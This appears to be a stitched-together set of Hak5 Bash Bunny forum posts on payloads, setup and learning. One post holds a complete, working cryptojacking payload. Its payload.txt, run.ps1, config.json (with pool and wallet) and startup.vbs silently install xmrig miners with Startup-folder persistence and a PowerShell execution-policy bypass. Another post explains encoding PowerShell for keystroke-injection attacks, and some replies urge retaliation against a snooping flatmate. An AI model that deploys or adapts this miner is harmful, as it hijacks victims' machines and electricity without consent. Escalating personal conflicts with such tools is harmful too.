Leaderboard

Sometimes it's easier to register an account on a hacking forum and post your request to a group of strangers with the hope that one of them has access to cellular network equipment. I would have done the same 😉

My first payload for the BB ? I just wanted to start off by saying that I don’t have a background in IT, I’m just an enthusiast. I did this really just to get more familiar with scripting and security, so I welcome any comments/criticisms. I should note that Ar1k88 posted mining payloads sometime ago so creds to him for the original idea. I ended up writing my own scripts rather than editing his ones and made some improvements e.g. combining the CPU and GPU miners into one payload, adding persistence, silent mode, etc. Some notes below if you care: Silent Mode You can set the miners to run in the background by editing the startup.vbs script and change “1” to “0” on line 3 & 4 or change the .json config file line 11 from “false” to “true”. The CPU usage is also editable in the config file so you can set it to a lower value and avoid visibly slowing down the host’s performance (at the expense of the hash rate). Once you execute the GPU miner, the computer will become almost non-responsive so definitely noticeable. Persistence I liked the idea of a VB script that runs on every startup which then subsequently initiates the miners. Windows of course didn’t like the idea of running scripts (I don’t know if this is a default security setting) but adding the vbs file as an exception to the execution policy seems to have fixed that (reference line 16 of run.ps1). Instructions You will need to download the xmrig binaries (or compile from source). Your browser and/or AV will most likely try to block the downloads. Windows Defender doesn't seem to mind though. https://github.com/xmrig/xmrig/releases https://github.com/xmrig/xmrig-nvidia (sorry I forgot to add AMD support but it’s getting late and I have work tomorrow) Copy the downloaded exe files (xmrig.exe and xmrig-nvidia.exe) and the following files into switch 2 folder in BB: payload.txt # Title: Silent Monero Miner (with persistence) # Description: Monero CPU miner (https://github.com/xmrig), copies the miner and config files to local disk, and adds a script to startup # Author: icarus255 # Props: 0dyss3us (KeenanV) - I like his idea of adding the VB script to startup # Version: 1.0 # Category: Mining # Target: Windows 10 # Attackmodes: HID, Storage # Comments: You will need to download the binaries from (https://github.com/xmrig/) or compile from source # Silent mode: You can start in silent mode (background) by changing config.json line 16: "background": false, -> "background": true, #Setup LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION #Wait for drive recognition Q delay 4500 #Run the Powershell script starts the miners, copies the files to local disk, and adds to startup. LED ATTACK RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED FINISH run.ps1 $Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name $user= $env:UserName $cpuminer = $Drive + "payloads\switch2\xmrig.exe" $configfile = $Drive + "payloads\switch2\config.json" $startupscript = $Drive + "payloads\switch2\startup.vbs" $nvidiaminer = $Drive + "payloads\switch2\xmrig-nvidia.exe" $StartupFolder = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") $LocalFolder = ("C:\MoneroTest") Set-Location -Path $Drive + "payloads\switch2" copy-item -Path $cpuminer -Destination (new-item -type directory $LocalFolder) -force -ea 0 copy-item $configfile -Destination $LocalFolder copy-item $nvidiaminer -Deistnation $LocalFolder copy-item $startupscript -Destination $StartupFolder Unblock-File -Path $StartupFolder + "startup.vbs" Set-Location -Path $StartupFolder Start-Process cmd -ArgumentList "/c start startup.vbs" config.json { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 5, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 75, "pools": [ { "url": "pool.minexmr.com:4444", "user": "424MefYkUWB16pj42Fcsu1DVeGyywsoeY96oQkLcokoKSU2WyywLNdRXj2ms7y2JQk7c4QpTtsxZsdspHbWiwzc91rbBCjL", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": 1 } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": null, "user-agent": null, "watch": false } startup.vbs Dim WshShell Set WshShell = WScript.CreateObject("WScript.shell") WshShell.Run "powershell.exe C:\MoneroTest\xmrig.exe", 1, False WshShell.Run "powershell.exe C:\MoneroTest\xmrig-nvidia.exe", 1, False

Since it has been so quiet in the BashBunny forums...... So, adding on to the BBTPS is becoming challenging where I began multiple rewrites to make it modular and due to pressure from my local hackerspace (mainly the python group as something to talk about when done) the server that used to be nodejs will be done in python2. Due to the massive rewrite and additional features though will look oddly the same, the BBTPS new version will be called the BBMPS (BashBunny Mutli Payload Stager). Its category is still the same. It is a tool, not a payload. Listening to criticism about the BBTPS, mainly it being hard to understand and so many config files, I broke it down to fewer. Hey, when you make something that can serve up multiple scripts and stuff you cannot have 1 config file. So, most of the work will be in payload.txt. You still will need to implement a json job file in the folder with your scripts except there will be 1 extra option in the json file. You will have the ability to specify if a job needs admin to run or not. This is identified in the job json file. If the agent (which is still powershell for windows)is elevated then it will run that script else it will skip it. This leads to autoadmin. Yelp. This will add multiple stages though. Instead of you specifying in the BBMPS you want admin or not it will check in the first stage it downloads if you can have it. If the account it is run under is admin and have not been elevated then through a process it will launch a new stager to grab the agent as elevated and signal the bunny to hit alt-y to get past the prompt with no exploit being ran to trigger anything suspicious. If you cannot get admin then it will launch the agent in userland and run only payloads that do not require admin. This leads into the Powershell agent. Because it has been long enough, the agent will no longer work on machines with Powershell version less than 4. The BBTPS will be archived as the Powershell 2.0 version. The agent will be faster as I finally figured out how to get jobs to kill themselves when done so no more constantly check for stuck and finish jobs in a cycle except to see if it is time to download more or kill the bunny because all jobs are gone and nothing is on the BB server. The agent will also automatically run a job to gather machine info though still working on how much I can get between running in userland and running as elevated admin. Since I will be doing this in python, I will be able to integrate impacket's smbserver directly into the web api that the agents will be using. The smbserver will be part of the web api, so logging and stuff can be controlled more granularly. The impacket tool will still be a requirement. I have given up on autodetecting OS in a fast way. There are ways but this tool is meant to spin off a bunch of payloads as fast as possible so to offset this I am working through implementing hoppeye8x still so if you enable it you will have choices for on the fly moments but the first iteration will not have multi-OS nor 8x still as I am working through how to handle auto-admin for linux and Mac. Last, since I made the no-express branch the default branch for the BBTPS repo (that is the newest version that I rebuilt that does not require any node dependencies) BBMPS may take a bit to release. Like with the node api server in the BBTPS, I am trying to keep with the core packages already on the bunny for building the python web api. That means no flask or other packages that makes building those apis easier with less code. More code means more time and I have a busy couple months so lets see how long it takes me.

Using a webcrawler, lay down a smokescreen. Send so much random traffic to his sniffer that it fills his harddrive. That's just for starters, lol. https://github.com/slacker69/QtSmokescreen

@UnLo@Forkish RE: 400GB microSD card UPDATE ... So, I recently bought a raspberry pi 3 along with a 400GB SanDisk microSDXC card via their online store and after formatting it to FAT32 with the built-in 'Disk' Utility manager on my Linux OS (since Windows cannot format exFAT over 32GB...), I plugged it into my nano and it reads 366.7GB/393.7GB* --- SUCCESS! 🙂 I didn't try adding any modules but since my nano reads the 400GB microSDXC, I'll assume that it will add modules and all other data just like having a 16GB microSD card, except with larger space.

Call the cops.

Go to google playstore search "Learn to code" coding is basics of "hacking" being able to change a codescript to your usage . Lots of good apps to learn from. I use them all the time to waste time and learn something.. Personal faves. Sololearn every code language you can think of its so good!! Grasshopper its very simple but gets to the point.

Oneliners got you down? Trying to type out all that text and including escapes getting confusing and then modifying later on is even more frustrating? Well, lets try having our one liner a multiliner in the beginning and encode it, all from bash. Complete with all the bash variables you want to pass and powershell variables you want to be unharmed. The original premise is from @elkentaro post about PowerRun he wrote using iconv. This can convert files to whatever encoding you want. Well, we are not converting files here, we will be converting echoed text...or echoed variable. Lets do the example as a payload since most of you may not run linux or if you do, do not run Powershell 6 on it to test seamlessly. This is a hacky way of doing it but it works. LED SETUP MYTEXT="Charles" MYSCRIPT=" \$name = \"$MYTEXT\"; cls' Start-Sleep -s 2 Write-Host \"Hello there, \$(\$name).\"; " ENCODED=$(echo $MYSCRIPT | iconv -t utf-16le | base64 -w 0) ATTACKMODE HID Q DELAY 5000 LED ATTACK GUI r Q STRING "cmd" Q DELAY 500 Q ENTER Q DELAY 2000 Q STRING "powershell -E \"$ENCODED\"" Q DELAY 700 Q ENTER LED FINISH So, you still have to escape (") when inside quotes or use single quotes instead but isn't that much easier to follow? You also still need to escape ($) where you want to them passed to powershell rather than bash replace with its own value it has. Also, since bash concatenates each line, you will have to add a semicolon to each line except where a loop starts and begin or statement like below. MYTEXT=" while \$true { Start-Sleep -s 1; Write-Host "Running loop"; } " #or MYTEXT=" if(\$i -eq 4) { Write-Host \"Item is 4.\"; } " Now, if you do not need to pass any values to from bash then you can have all your Powershell in a file all neat and formatted without all the escapes and stuff and then use the PowerRun method to encode. This is a lost gem I decided to resurrect and show a spin on.

It can. By using 3rd party tools from github + a little tweaking.

Move out and get a different flat with better room mates.

Don't use the Wi-Fi and stop paying for it. Or Get another wireless interface (e.g. USB Wi-Fi dongle) for your Windows PC. Use that to create your own Wi-Fi AP on your Windows PC. Connect all devices to your new windows AP, Configure Windows PC to route all your AP traffic through your VPN. Delete his AP from your known networks from all devices other than the windows PC. I don't condone revenge... it usually ends in trouble that isn't worth the short term satisfaction. But you do currently have the upper hand for mischief. Currently he does not know you know he's watching... Get creative.

That may well be true but in your question the term "hacking" is possibly just a little bit too broad. To look at it another way it's kinda like someone saying "I barely know anything about electronics, should I buy an oscilloscope?". If they have decided that the aspect of electronics they are really interested in will need them to have one, get one. If they don't know yet, no. Similarly with "hacking" or pen-testing. If you have already decided that the aspect of pen-testing you are already interested in is what the bash bunny is good for, get one. Hak5 itself doesn't seem to be putting out any content now, so have a view of the older Hak5 vids where they actually talk about pen-testing topics. Maybe have a rummage though Null Byte's vids as well. See if there is a particular aspect that particularly interests you. Then watch vids and read up on it a bit, download a few tools, destroy a VM or three, maybe tinker with a bit of wifi sniffing and get the feel of it. Experiment and be realistic. You are unlikely to be able to instantly (or ever) get to grips with methods of privilege escalation or exploiting current vulnerabilities and, like me, you may never want or need to. Use your own dedicated kit (such as Raspberry Pis and / or VMs) when experimenting. This means you can control all aspects of the scenario you have set up. Also you won't get into trouble and this is important as even if you didn't intend to you could fall foul of the law just by not knowing what you are doing. Things like an unitintentionally "uncontrolled" payload can cause havoc. Additionally you won't get frustrated when current security tools on your day to day kit throws up warnings about a bash bunny payload, the presence of a LAN Turtle or light up like a christmas tree when you switch on the "man in the middle" mode on a pineapple, because you can disable any security or not even install it withot it affecting your primary system(s). All those "frustrations" have happened to me. I am not trying to put you off or put you down, far from it. I did exactly what you are thinking of doing. I bought some Hak5 kit, plugged it in, got it working and thought "now what?" Sure I had some success but what did all this actually mean? I did not know enough to understand or make use of it. So I put it away, decided to concentrate on basic wifi as a start, got one of my Rasberry Pis, an old Alfa USB wifi device, a spare access point to be my victim, and proceeded to try to install and use Aircrack. As I went along I became more familiar with the terminology and the techniques behind what the Pineapple does and moved on from there onto other aspects. Finally, if you are anything like me and just like gadgets, you'll probably get one anyway regardless of what anyone says 🙂

See some people getting stuck with updating bunnies and tools etc. so put together quicklist of what I did from a brand new bash bunny on my linux box. I'm sure there are some differences with OSX and windows but in general with adaptation or tweaks this should work for all as a general outline. 1. Read the wiki - seriously even if you dont remember it all, know where it is and use it for reference. 2. Switch position to 3 (closest to USB) and insert to pc. With mine I got a blue light. I also backed up the original payloads dir but its not required. 3. Clone the payloads github locally or download the zip and extract the contents. 4. Copy the payload folder you just cloned or extracted to the bash bunny storage and overwrite all. You now have latest payloads. At this point if you were to unplug the bunny, select switch 1 or 2 and then reinsert you would see a purple light rather than the blue one that came from factory (at least mine did). 5. Some payloads require dependencies such as quick creds. You install the dependencies using the tools_installer payload So its worth running this payload as your first payload. On the Bashbunny storage delete the payload in switch 1 or 2 and then CUT the contents of /payloads/library/tools_installer/ to the switch folder of choice. DONT copy it as there is a slight bug if you have 2x copy’s of this payload on the bashbunny storage when its run. Unplug the bunny and select the switch to match where you placed the payload and reinsert the bunny. If all goes well you should eventually see a white LED. if you see red LED you may need to check the forums. From this point your ready to try other payloads or start developing new ones. Talking of which I almost forgot DuckToolkit adds support for new languages. and uses the Ducktoolkit python library for encoding. I had some issues getting the bunny online with ICS on linux but was mostly down to me not reading things in the bb.sh ICS script but I will point them out in case others do the same. 1. A factory fresh bashbunny can only ICS when switch is in position 1 or 2 not in arming mode position 3. There is no Ethernet device on a factory fresh bunnny in arming mode. 2. When you download and run the bb.sh it should be first run without the bashbunny inserted and when the script gets to stage 3 you insert the bashbunny to complete the guided config. 3. Just because you configured the bb.sh does not mean your online, you still need to hit C to connect with the current configuration and start ICS. So from here you should have Bashbunny with up to date payloads, dependencies installed and are able to ICS to get it online if required. Hope this helps some people.